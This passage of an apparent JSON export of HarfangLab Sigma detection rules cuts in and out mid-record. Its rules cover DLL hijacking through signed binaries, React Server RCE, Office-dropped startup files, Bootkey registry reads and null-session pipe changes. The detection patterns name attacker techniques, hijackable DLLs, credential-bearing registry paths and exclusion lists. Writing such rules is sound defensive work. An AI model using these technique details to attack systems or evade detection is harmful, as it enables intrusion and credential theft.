library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msra.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\NDFAPI.DLL'\n - '\\SspiCli.dll'\n - '\\USERENV.dll'\n - '\\UxTheme.dll'\n - '\\wdi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "14c2f793-59ba-4331-86c7-8146946b4943", "rule_name": "DLL Hijacking via msra.exe", "rule_description": "Detects potential Windows DLL Hijacking via msra.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "14c9835b-73bc-4bc6-a202-6591317a11fb", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.082369Z", "creation_date": "2026-03-23T11:45:34.082371Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.082375Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_vmnat.yml", "content": "title: DLL Hijacking via vmnat.exe\nid: 14c9835b-73bc-4bc6-a202-6591317a11fb\ndescription: |\n Detects potential Windows DLL Hijacking via vmnat.exe from VMware.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/05/16\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vmnat.exe'\n ProcessSignature: 'VMware, Inc.'\n ImageLoaded|endswith: '\\shfolder.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "14c9835b-73bc-4bc6-a202-6591317a11fb", "rule_name": "DLL Hijacking via vmnat.exe", "rule_description": "Detects potential Windows DLL Hijacking via vmnat.exe from VMware.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-05-16", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.628587Z", "creation_date": "2026-03-23T11:45:34.628589Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.628593Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053", "https://attack.mitre.org/techniques/T1190/" ], "name": "t1190_potential_react_server_rce_exploitation_linux.yml", "content": "title: Potential React-Server RCE Exploitation (Linux)\nid: 14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80\ndescription: |\n Detects suspicious command-line related to the exploitation of the React Server vulnerability (CVE-2025-55182).\n CVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\n It is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\nreferences:\n - https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/12/05\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CVE-2025-55182\n - classification.Linux.Exploit.React2Shell\n - classification.Linux.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n ParentCommandLine|startswith: 'next-server'\n\n exclusion_legitimate_subprocesses:\n CommandLine|contains:\n # MISP\n - '/var/www/MISP/app/Console'\n # Jest worker\n - '/next/dist/compiled/jest-worker/'\n # Supercronic\n - 'supercronic -quiet /app/docker/cronjobs'\n # PostCSS\n - '.next/dev/build/postcss.js'\n - 'cat /proc/mounts'\n - 'cat /proc/stat'\n - 'df -kPT'\n - 'df -lkPTx'\n - 'node */.next/transform.js'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80", "rule_name": "Potential React-Server RCE Exploitation (Linux)", "rule_description": "Detects suspicious command-line related to the exploitation of the React Server vulnerability (CVE-2025-55182).\nCVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\nIt is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\n", "rule_creation_date": "2025-12-05", "rule_modified_date": "2026-02-11", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.initial_access" ], "rule_technique_tags": [ "attack.t1190" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1548f31b-b093-436b-a9cb-97bc28e00de7", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.088839Z", "creation_date": "2026-03-23T11:45:34.088841Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.088845Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1547/001/" ], "name": "t1547_001_persistence_file_startup_phishing_attack.yml", "content": "title: Suspicious File Added/Modified in Startup Directory by Office Application\nid: 1548f31b-b093-436b-a9cb-97bc28e00de7\ndescription: |\n Detects when a file is added or modified in the startup directory in relation with a phishing attack.\n After compromising a host, attackers may achieve persistence by adding a program to a startup folder.\n It is recommended to analyze the process dropping the file as well as the file itself to look for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2022/06/20\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_event:\n Kind:\n - 'create'\n - 'write'\n Path|contains:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' # individual user : c:\\users\\xxx\\appdata\\...\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\' # all users\n\n selection_image:\n ProcessImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n\n selection_parentimage:\n ProcessParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n\n selection_extension:\n Path|endswith:\n - '.bat'\n - '.chm'\n - '.cmd'\n - '.cpl'\n - '.exe'\n - '.hta'\n - '.js'\n - '.jse'\n - '.lnk'\n - '.ps1'\n - '.scr'\n - '.vbe'\n - '.vbs'\n - '.wsf'\n\n exclusion_onenote:\n ProcessImage: '*\\Office??\\ONENOTE.EXE'\n Path:\n - '*OneNote*.lnk' # Envoyer a OneNote.lnk / Send to OneNote.lnk / An OneNote senden.lnk\n - '*\\OneNote ???? *.lnk' # OneNote 2010 Screen Clipper and Launcher.lnk / OneNote 2010 - Capture d'ecran et lancement.lnk\n\n exclusion_astngo:\n ProcessCommandLine|contains: '--single-argument https://my.astngo.com/'\n\n condition: selection_event and selection_extension and (selection_image or selection_parentimage) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1548f31b-b093-436b-a9cb-97bc28e00de7", "rule_name": "Suspicious File Added/Modified in Startup Directory by Office Application", "rule_description": "Detects when a file is added or modified in the startup directory in relation with a phishing attack.\nAfter compromising a host, attackers may achieve persistence by adding a program to a startup folder.\nIt is recommended to analyze the process dropping the file as well as the file itself to look for malicious content.\n", "rule_creation_date": "2022-06-20", "rule_modified_date": "2025-02-19", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1547.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "156f56a4-6a01-405e-9c87-d4546f76e6a1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.588600Z", "creation_date": "2026-03-23T11:45:34.588603Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.588611Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_wusa.yml", "content": "title: DLL Hijacking via wusa.exe\nid: 156f56a4-6a01-405e-9c87-d4546f76e6a1\ndescription: |\n Detects potential Windows DLL Hijacking via wusa.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wusa.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dpx.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "156f56a4-6a01-405e-9c87-d4546f76e6a1", "rule_name": "DLL Hijacking via wusa.exe", "rule_description": "Detects potential Windows DLL Hijacking via wusa.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "15957b9b-c39e-4caf-af47-506917f3c1e2", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.095096Z", "creation_date": "2026-03-23T11:45:34.095098Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.095102Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-descriptor-modification-2cf505ec5c40", "https://attack.mitre.org/techniques/T1552/002/" ], "name": "t1003_002_susp_registry_read_bootkey.yml", "content": "title: Windows Bootkey Read from Registry\nid: 15957b9b-c39e-4caf-af47-506917f3c1e2\ndescription: |\n Detects a suspicious read operation on registry keys storing Windows Bootkey also referred to as the SysKey.\n The BootKey/SysKey is an encryption key that is stored in the Windows SYSTEM registry hive.\n This key is used by several Windows components to encrypt sensitive information like the AD database, machine account password or system certificates.\n It is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\nreferences:\n - https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-descriptor-modification-2cf505ec5c40\n - https://attack.mitre.org/techniques/T1552/002/\ndate: 2024/04/02\nmodified: 2025/09/25\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.002\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject|startswith:\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\JD\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\JD\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\SKEW1\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\SKEW1\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\GBG\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\GBG\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\DATA\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\DATA\\'\n\n filter_lsass:\n Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n\n filter_logonui:\n ProcessImage: '?:\\Windows\\System32\\logonui.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_setup_host:\n - Image: '?:\\$WINDOWS.~BT\\Sources\\\\*.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n # Altered versions of Windows can sometimes be unsigned.\n - Image: '?:\\$WINDOWS.~BT\\Sources\\\\*.exe'\n ProcessParentOriginalFileName: 'SetupPrep.exe'\n\n # Too many fp, maybe a normal behavior in order to decode some information in registry\n exclusion_regedit:\n Image:\n - '?:\\Windows\\regedit.exe'\n - '?:\\Windows\\SysWOW64\\regedit.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_wmiprvse:\n Image: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_ivanti:\n Image|endswith: '\\SupportToolkit.exe'\n ProcessOriginalFileName: 'SupportToolkit.exe'\n ProcessDescription: 'Ivanti Support Toolkit'\n\n exclusion_fennec_windows:\n ProcessOriginalFileName: 'Fox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "15957b9b-c39e-4caf-af47-506917f3c1e2", "rule_name": "Windows Bootkey Read from Registry", "rule_description": "Detects a suspicious read operation on registry keys storing Windows Bootkey also referred to as the SysKey.\nThe BootKey/SysKey is an encryption key that is stored in the Windows SYSTEM registry hive.\nThis key is used by several Windows components to encrypt sensitive information like the AD database, machine account password or system certificates.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\n", "rule_creation_date": "2024-04-02", "rule_modified_date": "2025-09-25", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.discovery" ], "rule_technique_tags": [ "attack.t1012", "attack.t1552.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "15aecbb0-3084-4252-96c2-c5ab1b3d4ea3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.621211Z", "creation_date": "2026-03-23T11:45:34.621213Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.621217Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://web.archive.org/web/20230726161232/", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", "https://attack.mitre.org/techniques/T1021/001/", "https://attack.mitre.org/techniques/T1021/002/", "https://attack.mitre.org/techniques/T1071/" ], "name": "t1021_001_nullsessionpipe_added_in_registry.yml", "content": "title: Null Session Pipe Added in Registry\nid: 15aecbb0-3084-4252-96c2-c5ab1b3d4ea3\ndescription: |\n Detects the modification of the LanmanServer Registry configuration allowing for Null Sessions to access a new pipe.\n Attackers can use this technique to allow all anonymous users to access a specific pipe, for example to perform lateralization through RDP.\n It is recommended to analyze the process responsible for the registry modification to look for malicious content or actions, and to investigate any subsequent suspicious actions (e.g RDP) on the host.\nreferences:\n - https://web.archive.org/web/20230726161232/\n - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1021/002/\n - https://attack.mitre.org/techniques/T1071/\ndate: 2022/11/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Services\\LanManServer\\Parameters\\NullSessionPipes'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_expressconnect:\n ProcessImage:\n - '?:\\Program Files\\ExpressConnect\\ExpressConnect.exe'\n - '?:\\Program Files (x86)\\ExpressConnect\\ExpressConnect.exe'\n\n exclusion_raps:\n ProcessImage: '?:\\Program Files\\Rivet Networks\\SmartByte\\RAPS.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Rivet Networks LLC'\n\n exclusion_tiworker:\n - ProcessCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n - ProcessParentCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n\n exclusion_rivet:\n ProcessParentImage:\n - '?:\\Program Files\\Rivet Networks\\SmartByte\\RAPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\KAPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\KSPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\xTendSoftAPService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\xTendUtilityService.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n Details:\n - ';netlogon;samr'\n - ';netlogon;samr;lsarpc'\n\n exclusion_etiam:\n ProcessImage: '?:\\Program Files (x86)\\ETIAM\\IDA\\idaSCP.exe'\n\n exclusion_epson:\n ProcessImage|endswith: '\\PLPOUSVR.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEIKO EPSON CORPORATION'\n\n exclusion_hp:\n ProcessImage|endswith: '\\flcdlock.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'HP Inc.'\n - 'Hewlett Packard Enterprise Company'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "15aecbb0-3084-4252-96c2-c5ab1b3d4ea3", "rule_name": "Null Session Pipe Added in Registry", "rule_description": "Detects the modification of the LanmanServer Registry configuration allowing for Null Sessions to access a new pipe.\nAttackers can use this technique to allow all anonymous users to access a specific pipe, for example to perform lateralization through RDP.\nIt is recommended to analyze the process responsible for the registry modification to look for malicious content or actions, and to investigate any subsequent suspicious actions (e.g RDP) on the host.\n", "rule_creation_date": "2022-11-28", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.defense_evasion", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1021.002", "attack.t1071", "attack.t1112", "attack.t1562" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "15cc636a-9f89-4eaa-b9fe-04eb31aca42e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.587835Z", "creation_date": "2026-03-23T11:45:34.587838Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.587846Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_msitran.yml", "content": "title: DLL Hijacking via MsiTran.exe\nid: 15cc636a-9f89-4eaa-b9fe-04eb31aca42e\ndescription: |\n Detects potential Windows DLL 